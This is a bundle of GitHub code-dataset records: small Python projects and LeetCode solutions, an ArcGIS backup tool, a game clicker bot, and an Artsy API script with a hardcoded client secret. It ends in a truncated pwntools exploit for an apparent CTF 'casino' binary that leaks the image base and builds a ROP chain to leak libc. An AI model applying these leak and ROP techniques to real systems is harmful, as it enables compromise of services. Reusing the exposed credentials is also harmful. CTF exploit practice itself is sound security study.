self.use_skill(BUTTON_SPOIL)\n self.__spoil_used = True\n\n def actions_on_target_death(self):\n self.use_skill(BUTTON_SWEEP)\n self.__spoil_used = False\n\n","repo_name":"CkimiHoK/Lineage2_Clicker_Bot","sub_path":"logic/classes/dwarven_fighter.py","file_name":"dwarven_fighter.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40814950845","text":"import numpy\n\nfrom scipy.interpolate import spline, lagrange\nfrom math import tan\nfrom scipy.integrate import quad\n\nx = numpy.array([-1.0, -0.96, -0.86, -0.79, 0.22, 0.5, 0.93])\nfx = numpy.array([-1.0, -0.151, 0.894, 0.986, 0.895, 0.5, -0.306])\n\n\ndef getXk(k):\n return -1 + 0.1 * k\n\n\nxk = numpy.array([])\nfor i in range(1, 20):\n xk = numpy.append(xk, getXk(i))\n\nsplineResult = spline(x, fx, xk)\nlagrangeResult = lagrange(x, fx)\n\nfor i in range(0, 19):\n print(\"Xk = \" + str(xk[i])),\n print(\":\\t SPLINE: \" + str(splineResult[i])),\n print (\"\\tLAGRANGE: \" + str(lagrangeResult(xk[i]))),\n print (\" \\t S - L: \" + str(float(splineResult[i] - lagrangeResult(xk[i]))))\n\nquanc8Result = quad(lambda num: tan(num) / num, 1, 2)\nprint (\"integral for quanc8: \" + str(quanc8Result))\n","repo_name":"bmendli/computational-mathematics-labs","sub_path":"computational-mathematics-py/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8371455244","text":"from PyQt6.QtWidgets import QMainWindow, QSplitter, QMenu, QMenuBar\nfrom PyQt6.QtGui import QKeySequence\nfrom .WorkingSpace import WorkingSpace\nfrom .ControlTreeView import ControlTreeView\nfrom writers.SettingsWriter import edit_default_settings\nclass MainView(QMainWindow):\n \"\"\"\n Implements relACs user interface.\n \"\"\"\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"RelACs\")\n self.setObjectName(\"MainWindow\")\n\n \n self.splitter = QSplitter()\n \n self.working_space = WorkingSpace()\n self.control_tree: ControlTreeView = ControlTreeView(self.working_space)\n \n self.splitter.addWidget(self.control_tree)\n self.splitter.addWidget(self.working_space)\n self.splitter.setStretchFactor(0,6)\n self.splitter.setStretchFactor(1,9)\n\n self.menubar = QMenuBar(self)\n \n self.menuSettings = QMenu(self.menubar)\n self.menuSettings.setObjectName(\"menuSettings\")\n self.menuSettings.setTitle(\"Settings\")\n self.menuSettings.addAction(\"Default Settings\", edit_default_settings)\n self.menubar.addAction(self.menuSettings.menuAction())\n\n self.menuSettings = QMenu(self.menubar)\n self.menuSettings.setTitle(\"File\")\n self.menuSettings.addAction(\"Save\", self.control_tree.compounds.save)\n self.menuSettings.addAction(\"Save as ...\", self.control_tree.compounds.save_to_json)\n self.menubar.addAction(self.menuSettings.menuAction())\n self.setMenuBar(self.menubar)\n\n\n self.menuSettings = QMenu(self.menubar)\n self.menuSettings.setTitle(\"Undo/Redo\")\n self.menuSettings.addAction(\"Undo | Ctrl+Z\", self.try_undo)\n self.menuSettings.addAction(\"Redo | Ctrl+Y\", self.try_redo)\n self.menubar.addAction(self.menuSettings.menuAction())\n self.setMenuBar(self.menubar)\n\n self.setCentralWidget(self.splitter)\n\n def try_redo(self):\n try:\n self.working_space.currentWidget().on_redo() \n except Exception as e:\n pass\n\n def try_undo(self):\n try:\n self.working_space.currentWidget().on_undo() \n except Exception as e:\n pass\n\n 
","repo_name":"ZychuDev/relACs","sub_path":"views/MainView.py","file_name":"MainView.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42217818034","text":"import requests\n\nclient_id = '43e63a41d246d6b8028b'\nclient_secret = 'f95bcdbdc757ca39b0802f0545e9bf58'\n\ndef get_token():\n url = 'https://api.artsy.net/api/tokens/xapp_token'\n data = {\n 'client_id': client_id,\n 'client_secret': client_secret\n }\n response = requests.post(url, data=data)\n return response.json()['token']\n\ndef get_genes(token):\n url = 'https://api.artsy.net/api/genes/'\n headers = {\n 'X-Xapp-Token': token\n }\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n return response.json()\n else:\n return 'Error' + str(response.status_code)\n\ndef get_impressionistic_paintings(token):\n url = 'https://api.artsy.net/api/search?q=impressionism+more:pagemap:metatags-og_type:artwork'\n headers = {\n 'X-Xapp-Token': token\n }\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n return response.json()\n else:\n return 'Error' + str(response.status_code)\n\ntoken = get_token()\ngenes = get_impressionistic_paintings(token)\nprint(genes)\n","repo_name":"koljapluemer/inspirationbot","sub_path":"archive/artsy.py","file_name":"artsy.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37546511987","text":"'''\r\nCreated on Jan 24, 2017\r\n\r\n@author: kautilya.save\r\n'''\r\n\r\n\r\n\r\nscores=[(1489,\"Sean\"), (2850,\"Bob\"), (276,\"Crap Player\"), (78495, \"Great Player\"), (8473, \"Damian\"), (4860, \"Andy\"), (0, \"Stephen\")]\r\nscores2=[(1489,\"Sean\"), (2850,\"Bob\"), (276,\"Crap Player\"), (78495, \"Great Player\"), (8473, \"Damian\"), (4860, \"Andy\"), (0, \"Stephen\")]\r\nscores.sort(reverse= True)\r\n\r\nscores2.sort()\r\nprint(scores)\r\nprint(scores2)","repo_name":"SensehacK/playgrounds","sub_path":"python/PF/Intro/Day5/tuple.py","file_name":"tuple.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37216903681","text":"class Solution:\n def frequencySort(self, s: str) -> str: # O( K*NlogN | N) K is the distinct letter count in the s\n counter = defaultdict(lambda : 0)\n for c in s:\n counter[c] += 1 \n lst = sorted(set(counter.values()), reverse = True ) # remove dups from the counter list\n output = \"\"\n for t in lst:\n for k, v in counter.items():\n if t == v:\n output += k*v\n return output\n\n\n\n\n\n\n# previous solution\n\n# class Solution:\n# def frequencySort(self, s: str) -> str:\n# hmp = {}\n# for c in s:\n# if c not in hmp: \n# hmp[c] = 0 \n# hmp[c]+=1 \n \n# counter = {} \n# for k, v in hmp.items():\n# if v not in counter:\n# counter[v] = []\n# counter[v].append(k)\n \n# output = \"\"\n# for k in sorted(counter.keys(), reverse = True):\n# for i in counter[k]:\n# output += k*i\n# return output\n\n\n\n# previous approach\n# class Solution:\n# def frequencySort(self, s: str) -> str:\n# hmp = {}\n# for c in s:\n# if c not in hmp:\n# hmp[c] = 0\n# hmp[c] += 1\n# for_sort = []\n# for k, v in hmp.items():\n# for_sort.append([k, v])\n# output = \"\"\n# for s in sorted(for_sort, key=lambda x: x[1], reverse=True):\n# output += s[0] * s[1]\n# return output\n\n# OLD Solution\n# def frequencySort(s: str):\n# if len(s) ==0:\n# return \"\"\n# map 
= {}\n# for i in s:\n# if i not in map:\n# map[i] = 0\n# map[i]+=1\n# output = \"\"\n# t = [None]*(max(map.values())+1) #bucket sort\n# for i in map.values():\n# t[i] = i\n#\n#\n# for i in t[::-1]:\n# if i!= None:\n# for k,v in map.items():\n# if v == i:\n# output+= k*v\n# map[k] = -1\n#\n#\n# return output\n#\n#\n# print(frequencySort(\"tree\"))\n# print(frequencySort(\"cccaaa\"))\n# print(frequencySort(\"Aabb\"))\n# print(frequencySort(\"\"))\n# print(frequencySort(\"AA\"))\n# print(frequencySort(\"A\"))\n\n","repo_name":"renjieliu/leetcode","sub_path":"0001_0599/451.py","file_name":"451.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"37440918726","text":"#\n# [25] Reverse Nodes in k-Group\n#\n# https://leetcode.com/problems/reverse-nodes-in-k-group/description/\n#\n# algorithms\n# Hard (31.70%)\n# Total Accepted: 123.7K\n# Total Submissions: 390.2K\n# Testcase Example: '[1,2,3,4,5]\\n2'\n#\n# Given a linked list, reverse the nodes of a linked list k at a time and\n# return its modified list.\n# \n# k is a positive integer and is less than or equal to the length of the linked\n# list. If the number of nodes is not a multiple of k then left-out nodes in\n# the end should remain as it is.\n# \n# You may not alter the values in the nodes, only nodes itself may be changed.\n# \n# Only constant memory is allowed.\n# \n# For example,\n# Given this linked list: 1->2->3->4->5\n# \n# For k = 2, you should return: 2->1->4->3->5\n# \n# For k = 3, you should return: 3->2->1->4->5\n# \n#\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n ii = 0\n tail = head\n stack = []\n while (ii < k):\n if tail == None:\n break\n ii = ii + 1\n stack.append(tail)\n tail = tail.next # tail not included\n if ii < k:\n return head\n head = stack.pop()\n ptr = head\n while len(stack) != 0:\n ptr.next = stack.pop()\n ptr = ptr.next\n ptr.next = self.reverseKGroup(tail, k)\n return head\n","repo_name":"zhiymatt/Leetcode","sub_path":"Python/25.reverse-nodes-in-k-group.131452194.ac.py","file_name":"25.reverse-nodes-in-k-group.131452194.ac.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74240673653","text":"from collections import deque\nimport heapq\n\nclass Animal:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n self.order = 0\n\n def is_order_than(self, animal):\n return self.order < animal.order\n\nclass Dog(Animal):\n def __repr__(self):\n return \"Dog named {0} (age {1})\".format(self.name, self.age)\n\nclass Cat(Animal):\n def __repr__(self):\n return \"Cat named {0} (age {1})\".format(self.name, self.age)\n\nclass AnimalShelter:\n def add_animal(self, animal):\n raise NotImplementedError\n\n def get_dog(self):\n raise NotImplementedError\n\n def get_cat(self):\n raise NotImplementedError\n\n def get_any(self):\n raise NotImplementedError\n\nclass ArrivalBasedAnimalShelter(AnimalShelter):\n def __init__(self):\n self.dogs = deque()\n self.cats = deque()\n self.order = 0\n\n def add_animal(self, animal):\n animal.order = self.order\n self.order += 1\n if isinstance(animal, Dog):\n self.dogs.append(animal)\n elif isinstance(animal, Cat):\n self.cats.append(animal)\n\n def 
get_dog(self):\n return self.dogs.popleft() if self.dogs else None\n\n def get_cat(self):\n return self.cats.popleft() if self.cats else None\n\n def get_any(self):\n if not self.dogs:\n return self.get_cat()\n if not self.cats:\n return self.get_dog()\n\n if self.dogs[0].is_order_than(self.cats[0]):\n return self.get_dog()\n else:\n return self.get_cat()\n\nclass AgeBasedAnimalShelter(AnimalShelter):\n def __init__(self):\n self.dogs = []\n self.cats = []\n self.order = 0\n\n def add_animal(self, animal):\n animal.order = self.order\n self.order += 1\n if isinstance(animal, Dog):\n heapq.heappush(self.dogs, (-animal.age, animal.order, animal))\n elif isinstance(animal, Cat):\n heapq.heappush(self.cats, (-animal.age, animal.order, animal))\n\n def get_dog(self):\n return heapq.heappop(self.dogs)[-1] if self.dogs else None\n\n def get_cat(self):\n return heapq.heappop(self.cats)[-1] if self.cats else None\n\n def get_any(self):\n if not self.dogs:\n return self.get_cat()\n if not self.cats:\n return self.get_dog()\n\n dog = self.dogs[0]\n cat = self.cats[0]\n\n print(dog)\n print(cat)\n if (-dog[0], dog[1]) < (-cat[0], cat[1]):\n return self.get_dog()\n else:\n return self.get_cat()\n\ndef test_shelters():\n # Testing ArrivalBasedAnimalShelter\n arrival_shelter = ArrivalBasedAnimalShelter()\n\n dog1 = Dog(\"Buddy\", 5)\n cat1 = Cat(\"Whiskers\", 3)\n dog2 = Dog(\"Rex\", 7)\n cat2 = Cat(\"Mittens\", 2)\n\n arrival_shelter.add_animal(dog1)\n arrival_shelter.add_animal(cat1)\n arrival_shelter.add_animal(dog2)\n arrival_shelter.add_animal(cat2)\n\n assert arrival_shelter.get_any() == dog1\n assert arrival_shelter.get_dog() == dog2\n assert arrival_shelter.get_cat() == cat1\n assert arrival_shelter.get_any() == cat2\n\n # Testing AgeBasedAnimalShelter\n age_shelter = AgeBasedAnimalShelter()\n\n dog3 = Dog(\"Bruno\", 6)#1\n cat3 = Cat(\"Kitty\", 4)#2\n dog4 = Dog(\"Max\", 4)#3\n cat4 = Cat(\"Luna\", 6)#4\n\n age_shelter.add_animal(dog3)\n age_shelter.add_animal(cat3)\n age_shelter.add_animal(dog4)\n age_shelter.add_animal(cat4)\n\n assert age_shelter.get_any() == dog3 # Because Luna is the oldest at 6 years.\n assert age_shelter.get_dog() == dog4 # Because Bruno is older than Max.\n assert age_shelter.get_cat() == cat4\n assert age_shelter.get_any() == cat3\n\n print(\"All tests passed!\")\n\ntest_shelters()\n","repo_name":"Echozqn/energyTest","sub_path":"B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34092057114","text":"\"\"\"\nThis module provides examples demonstrating the WWZ by looking at a simple signal (2 Hz).\n\nPlease select whether to run in parallel or not.\nThere are 'linear' method and 'octave' method.\ncurrent example showcases both methods\n\nNOTE: The WWZ shows better information on frequency and WWA shows better information on amplitude.\n\"\"\"\n\nimport time\n\n# noinspection Mypy\nimport matplotlib.pyplot as plt\n# noinspection Mypy\nimport numpy as np\nimport libwwz.wwz as wwz\nimport libwwz.plot_methods as wwz_plot\n\n# Select Mode...\nparallel = True\n\n# number of time\nntau = 20 # Creates new time with this many divisions.\n\n# linear\nfreq_low = 1\nfreq_high = 5\nfreq_steps = 0.2 # Resolution of frequency steps\nfreq_lin = [freq_low, freq_high, freq_steps]\n\n# octave\nfreq_target = 2\nfreq_low = 0.5\nfreq_high = 6.5\nband_order = 3\nlog_scale_base = 10**(3/10)\noverride = False\nfreq_oct = [freq_target, freq_low, freq_high, band_order, 
log_scale_base, override]\n\n# decay constant (c < 0.02) where c = 1/(2*w^2)\n# The analyzing wavelet decays significantly in a single cycle 2*pi/w, where w = 2*pi*f\nf = 2\nw = 2 * np.pi * f\nc = 1/(2*w**2)\n\n# Code to remove data points at random\n\ndef remove_fraction_with_seed(data, fraction, seed=np.random.randint(1)):\n \"\"\"\n removes fraction of data at random with given seed.\n :param data: data to remove\n :param fraction: fraction to remove\n :param seed: seed for randomness\n :return: data with fraction removed\n \"\"\"\n n_to_remove = int(len(data) * fraction)\n np.random.seed(seed)\n\n return np.delete(data, np.random.choice(np.arange(len(data)), n_to_remove, replace=False))\n\n\ndef run_examples() -> None:\n \"\"\"\n An example of WWZ/WWA using a sine function time series with missing data will be shown.\n \"\"\"\n\n # Set timestamps\n sample_freq = 80\n timestamp = np.arange(0, 60, 1 / sample_freq)\n\n # Create simple signal (2hz)\n sine_2hz = np.sin(timestamp * 2 * (2 * np.pi))\n simple_signal = sine_2hz\n\n # Remove 80% of the signal at random\n simple_removed = remove_fraction_with_seed(simple_signal, 0.8)\n timestamp_removed = remove_fraction_with_seed(timestamp, 0.8)\n\n # Get the WWZ/WWA of the signals (linear)\n # 'linear'\n starttime = time.time()\n WWZ_simple_linear = wwz.wwt(timestamp, simple_signal, ntau, freq_lin, c, 'linear')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_linear)')\n WWZ_simple_removed_linear = wwz.wwt(timestamp_removed, simple_removed, ntau, freq_lin, c, 'linear')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_removed_linear)')\n\n # 'octave'\n WWZ_simple_octave = wwz.wwt(timestamp, simple_signal, ntau, freq_oct, c, 'octave')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_octave)')\n WWZ_simple_removed_octave = wwz.wwt(timestamp_removed, simple_removed, ntau, freq_oct, c, 'octave')\n print(round(time.time() - starttime, 2), 'seconds has passed (finished WWZ_simple_removed_octave)')\n\n # Plot\n plt.rcParams[\"figure.figsize\"] = [14, 6]\n plt.rcParams.update({'font.size': 14})\n\n # Plot of base functions\n plt.figure(0)\n plt.plot(timestamp, simple_signal, '-')\n plt.plot(timestamp_removed, simple_removed, 'o')\n plt.ylabel(\"simple (count)\")\n plt.legend(['full', 'removed'], loc=1, fontsize=10)\n plt.xlabel(\"time (s)\")\n plt.suptitle('The simple signal (2 Hz)')\n\n # Plot of WWZ for simple and simple removed\n # 'linear'\n fig, ax = plt.subplots(nrows=2, ncols=2)\n wwz_plot.linear_plotter(ax=ax[0, 0],\n TAU=WWZ_simple_linear[0],\n FREQ=WWZ_simple_linear[1],\n DATA=WWZ_simple_linear[2])\n ax[0, 0].set_ylabel('full data (Hz)')\n ax[0, 0].set_xticks([])\n ax[0, 0].set_yticks([1, 2, 3, 4, 5])\n ax[0, 0].set_title('WWZ')\n\n wwz_plot.linear_plotter(ax=ax[1, 0],\n TAU=WWZ_simple_removed_linear[0],\n FREQ=WWZ_simple_removed_linear[1],\n DATA=WWZ_simple_removed_linear[2])\n ax[1, 0].set_ylabel('removed data (Hz)')\n ax[1, 0].set_xlabel('time (s)')\n ax[1, 0].set_yticks([1, 2, 3, 4, 5])\n\n # Plot of WWA for the same signal\n wwz_plot.linear_plotter(ax=ax[0, 1],\n TAU=WWZ_simple_linear[0],\n FREQ=WWZ_simple_linear[1],\n DATA=WWZ_simple_linear[3])\n ax[0, 1].set_title('WWA')\n ax[0, 1].set_xticks([])\n ax[0, 1].set_yticks([])\n\n wwz_plot.linear_plotter(ax=ax[1, 1],\n TAU=WWZ_simple_removed_linear[0],\n FREQ=WWZ_simple_removed_linear[1],\n DATA=WWZ_simple_removed_linear[3])\n ax[1, 1].set_xlabel('time (s)')\n ax[1, 1].set_yticks([])\n 
plt.suptitle('Linear Method')\n plt.tight_layout()\n\n # 'octave\n fig, ax = plt.subplots(nrows=2, ncols=2)\n wwz_plot.octave_plotter(ax=ax[0, 0],\n TAU=WWZ_simple_octave[0],\n FREQ=WWZ_simple_octave[1],\n DATA=WWZ_simple_octave[2],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[0, 0].set_ylabel('full data (Hz)')\n ax[0, 0].set_xticks([])\n ax[0, 0].set_title('WWZ')\n\n wwz_plot.octave_plotter(ax=ax[1, 0],\n TAU=WWZ_simple_removed_octave[0],\n FREQ=WWZ_simple_removed_octave[1],\n DATA=WWZ_simple_removed_octave[2],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[1, 0].set_ylabel('removed data (Hz)')\n ax[1, 0].set_xlabel('time (s)')\n\n # Plot of WWA for the same signal\n wwz_plot.octave_plotter(ax=ax[0, 1],\n TAU=WWZ_simple_octave[0],\n FREQ=WWZ_simple_octave[1],\n DATA=WWZ_simple_octave[3],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[0, 1].set_title('WWA')\n ax[0, 1].set_xticks([])\n ax[0, 1].set_yticks([])\n\n wwz_plot.octave_plotter(ax=ax[1, 1],\n TAU=WWZ_simple_removed_octave[0],\n FREQ=WWZ_simple_removed_octave[1],\n DATA=WWZ_simple_removed_octave[3],\n band_order=band_order,\n log_scale_base=log_scale_base)\n ax[1, 1].set_xlabel('time (s)')\n ax[1, 1].set_yticks([])\n plt.suptitle('Octave Method')\n plt.tight_layout()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n run_examples()\n","repo_name":"ISLA-UH/libwwz","sub_path":"examples/example_wwz.py","file_name":"example_wwz.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"70751626292","text":"class Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n # tranpose\n # left-right flip\n rows, cols = len(matrix), len(matrix[0])\n for r in range(rows):\n for c in range(r, cols):\n matrix[r][c], matrix[c][r] = matrix[c][r], matrix[r][c]\n \n for r in range(rows):\n for c in range(cols // 2):\n matrix[r][c], matrix[r][cols - c - 1] = matrix[r][cols - c - 1], matrix[r][c]\n \n \n ","repo_name":"HaojunYuan/MyLeetCode","sub_path":"0048-rotate-image/0048-rotate-image.py","file_name":"0048-rotate-image.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36656277918","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 9 12:12:37 2023\r\n\"\"\"\r\n__author__ = \"Manuel\"\r\n__date__ = \"Thu Feb 9 12:12:37 2023\"\r\n__license__ = \"Unlicense\"\r\n__version__ = \"1.0.1\"\r\n__maintainer__ = \"Manuel R. 
Popp\"\r\n__email__ = \"requests@cdpopp.de\"\r\n__status__ = \"Beta\"\r\n\r\nimport os, shutil, math\r\nimport arcpy as ap\r\nimport arcgis\r\nfrom arcgis.gis import GIS\r\n\r\nglobal AGOL_TYPES\r\nAGOL_TYPES = [\"CSV\",\r\n \"Dashboard\",\r\n \"Feature Collection\",\r\n \"Feature Service\",\r\n \"File Geodatabase\",\r\n \"Form\",\r\n \"KML\",\r\n \"KML Collection\",\r\n \"Service Definition\",\r\n \"Shapefile\",\r\n \"Web Map\"]\r\n\r\ndef get_value(inp):\r\n keep_types = (int, str, bool, type(None))\r\n val = inp.value if isinstance(inp.value, keep_types) else inp.valueAsText\r\n return val\r\n\r\nclass Toolbox(object):\r\n def __init__(self):\r\n self.label = \"AGOL Backup\"\r\n self.alias = \"Backup\"\r\n self.tools = [BackupLocal]\r\n\r\nclass BackupLocal(object):\r\n def __init__(self):\r\n self.label = \"Backup\"\r\n self.description = \"Create local backup of ArcGis Online items.\"\r\n self.canTunInBackground = False\r\n \r\n def getParameterInfo(self):\r\n global AGOL_TYPES\r\n USR = ap.Parameter(\r\n displayName = \"AGOL username\",\r\n name = \"usr\",\r\n datatype = \"GPString\",\r\n parameterType = \"Required\",\r\n direction = \"Input\")\r\n USR.value = \"manuel.popp_KIT\"\r\n PW = ap.Parameter(\r\n displayName = \"Password\",\r\n name = \"psswrd\",\r\n datatype = \"GPEncryptedString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\")\r\n PW.value = None\r\n COMPLETE = ap.Parameter(\r\n displayName = \"Complete backup\",\r\n name = \"complete\",\r\n datatype = \"GPBoolean\",\r\n parameterType = \"Required\",\r\n direction = \"Input\")\r\n COMPLETE.value = True\r\n OWNER = ap.Parameter(\r\n displayName = \"Owner (if different from user)\",\r\n name = \"owner\",\r\n datatype = \"GPString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\")\r\n OWNER.value = None\r\n DTYPES = ap.Parameter(\r\n displayName = \"Data types\",\r\n name = \"dtypes\",\r\n datatype = \"GPString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\",\r\n multiValue = True)\r\n DTYPES.filter.list = AGOL_TYPES\r\n DTYPES.value = None\r\n TAGS = ap.Parameter(\r\n displayName = \"Tags\",\r\n name = \"tags\",\r\n datatype = \"GPString\",\r\n parameterType = \"Optional\",\r\n direction = \"Input\",\r\n multiValue = True)\r\n OVERWRITE = ap.Parameter(\r\n displayName = \"Overwrite existing files\",\r\n name = \"overwrite\",\r\n datatype = \"GPBoolean\",\r\n parameterType = \"Required\",\r\n direction = \"Input\")\r\n OVERWRITE.value = False\r\n OUT_DIR = ap.Parameter(\r\n displayName = \"Backup directory\",\r\n name = \"out_dir\",\r\n datatype = \"DEFolder\",\r\n parameterType = \"Required\",\r\n direction = \"Output\")\r\n \r\n parameters = [USR, PW, COMPLETE, OWNER, DTYPES, TAGS, OVERWRITE, \\\r\n OUT_DIR]\r\n return parameters\r\n\r\n def isLicensed(self):\r\n return True\r\n\r\n def updateParameters(self, parameters):\r\n [USR, PW, COMPLETE, OWNER, DTYPES, TAGS, OVERWRITE, OUT_DIR] = \\\r\n parameters\r\n if COMPLETE.value:\r\n DTYPES.enabled = TAGS.enabled = False\r\n else:\r\n DTYPES.enabled = TAGS.enabled = True\r\n return\r\n\r\n def updateMessages(self, parameters):\r\n return\r\n\r\n def execute(self, parameters, messages):\r\n global AGOL_TYPES\r\n [USR, PW, COMPLETE, OWNER, DTYPES, TAGS, OVERWRITE, OUT_DIR] = \\\r\n [get_value(p) for p in parameters]\r\n \r\n if not os.path.isdir(OUT_DIR):\r\n os.makedirs(OUT_DIR, exist_ok = True)\r\n \r\n if PW is None:\r\n gis = GIS(\"pro\")\r\n else:\r\n gis = GIS(username = USR, password = PW)\r\n \r\n account_name = USR if OWNER 
is None else OWNER\r\n QUERY_STRING = \"owner:{0}\".format(account_name)\r\n my_content = gis.content.search(QUERY_STRING,\r\n max_items = 999)\r\n \r\n mssg = \"Found {0} items for user {1} on AGOL.\"\r\n n_items = len(my_content)\r\n ap.AddMessage(mssg.format(n_items, account_name))\r\n allowed_types = str(DTYPES).split(\";\") if not COMPLETE else \\\r\n AGOL_TYPES\r\n \r\n allowed_tags = set(str(TAGS).split(\";\")) if TAGS is not None else set()\r\n \r\n failed_downloads = []\r\n \r\n p = int(math.log10(n_items))\r\n \r\n if not p:\r\n p = 1\r\n \r\n increment = int(math.pow(10, p - 1))\r\n \r\n ap.SetProgressor(\"step\", \"Downloading items from AGOL...\", 0, n_items,\r\n increment)\r\n \r\n for i, item in enumerate(my_content):\r\n mssg = \"Checking conditions for item {0} of {1}\"\r\n ap.SetProgressorLabel(mssg.format(i, n_items))\r\n \r\n tagmatch = allowed_tags == set() or allowed_tags.intersection(\r\n set(item.tags))\r\n typematch = item.type in allowed_types\r\n mssg = \"Item {0}. Type: {1}\\nMatches item types: {2}\"\r\n ap.AddMessage(mssg.format(i, item.type, typematch))\r\n \r\n if tagmatch and typematch:\r\n try:\r\n item_name = item.title if item.title is not None else \\\r\n item.name\r\n path = os.path.join(OUT_DIR, item_name)\r\n \r\n if os.path.exists(path) and not OVERWRITE:\r\n continue\r\n \r\n mssg = \"Attempting to download {0} from ArcGIS Online.\"\r\n \r\n if item.type == \"Feature Service\":\r\n ap.SetProgressorLabel(mssg.format(item.title))\r\n ap.AddMessage(mssg.format(item.title))\r\n result = item.export(item.name, \"Shapefile\")\r\n result.download(path)\r\n result.delete()\r\n else:\r\n ap.SetProgressorLabel(mssg.format(item.name))\r\n ap.AddMessage(mssg.format(item.name))\r\n tmp = item.get_data()\r\n mssg = \"Saved as temporary file at \" + tmp\r\n ap.AddMessage(mssg)\r\n mssg = \"Attempting to move temporary file to \" + \\\r\n OUT_DIR\r\n ap.AddMessage(mssg)\r\n shutil.move(tmp, path)\r\n \r\n if os.path.getsize(path) > 0.:\r\n ap.AddMessage(\"Download successful.\")\r\n except:\r\n failed_downloads.append(item)\r\n mssg = \"Failed to download {0}.\"\r\n ap.AddWarning(mssg.format(item_name))\r\n ap.SetProgressorPosition(i)\r\n return\r\n","repo_name":"ManuelPopp/Sandbox","sub_path":"GIS/ArcGIS/Toolboxes/AGOL_Backup.pyt","file_name":"AGOL_Backup.pyt","file_ext":"pyt","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14825480871","text":"from pwn import *\nfrom pwn import p64\n\nIS_LOCAL = False\nIS_DEBUG = False\n\nINPUT_PATCHED_FILENAME = \"casino_patched\"\nINPUT_ORIG_FILENAME = \"casino\"\n\nREMOTE_HOST = \"\"\nREMOTE_PORT = 31375\n\n# setup terminal\ncontext.terminal = ['tmux', 'new-window', '-F' '#{pane_pid}', '-P']\n#run_in_new_terminal('bash')\n\nif IS_LOCAL:\n if IS_DEBUG:\n io = process(INPUT_PATCHED_FILENAME, aslr=False)\n #break *0x555555400f2b\n #break *0x555555400f26\n pid, io_gdb = gdb.attach(io, api=True, gdbscript=\"\"\"\n break *0x555555400f50\n continue\n \"\"\")\n else:\n io = process(INPUT_PATCHED_FILENAME)\nelse:\n io = remote(REMOTE_HOST, REMOTE_PORT)\n\ndef enter_game():\n io.recvuntil(b\"> \")\n io.sendline(b\"1\")\n\ndef skip_main_games():\n gems = 69\n while gems > 6:\n # select \"Rigged Roulette\"\n io.recvuntil(b\"> \")\n io.sendline(b\"1\")\n\n # send a wrong choice\n io.recvuntil(b\"> \")\n io.sendline(b\"-1\")\n\n # adjust a gems count\n gems -= 6\n\ndef skip_additional_roulette():\n io.recvuntil(b\"> \")\n io.sendline(b\"1\")\n\ndef 
get_image_base() -> int:\n io.recvuntil(b\"> \")\n io.sendline(b\".\")\n\n s = io.recvline_contains(b\"is not a valid number!\")\n\n leak_bin_addr = int(s.split(b' ', 2)[1], 10)\n\n LOCAL_BIN_LEAK = 0x555555400b20\n LOCAL_IMAGE_BASE = 0x00555555400000\n IMAGE_BASE_OFFSET = LOCAL_BIN_LEAK - LOCAL_IMAGE_BASE\n\n image_base = leak_bin_addr - IMAGE_BASE_OFFSET\n return image_base\n\ndef exploit(image_base: int):\n io.recvuntil(b\"> \")\n\n ret_addr = cyclic_find(b'oaaa')\n log.info(f'RET offset: {hex(ret_addr)}')\n\n # new_canary_offset = cyclic_find(b'kaaa')\n # log.info(f'New CANARY offset: {hex(new_canary_offset)}')\n\n # saved_canary_offset = cyclic_find(b'naav')\n # log.info(f'Saved CANARY offset: {hex(saved_canary_offset)}')\n\n elf = ELF(INPUT_ORIG_FILENAME)\n p_got_read = image_base + elf.got['read']\n p_plt_puts = image_base + elf.plt['puts']\n p_last_chance = image_base + elf.symbols['last_chance']\n\n # 0x00000000000018f3: pop rdi; ret;\n pop_rdi = image_base + 0x00000000000018f3\n\n # leak LIBC address\n payload = flat(\n {\n 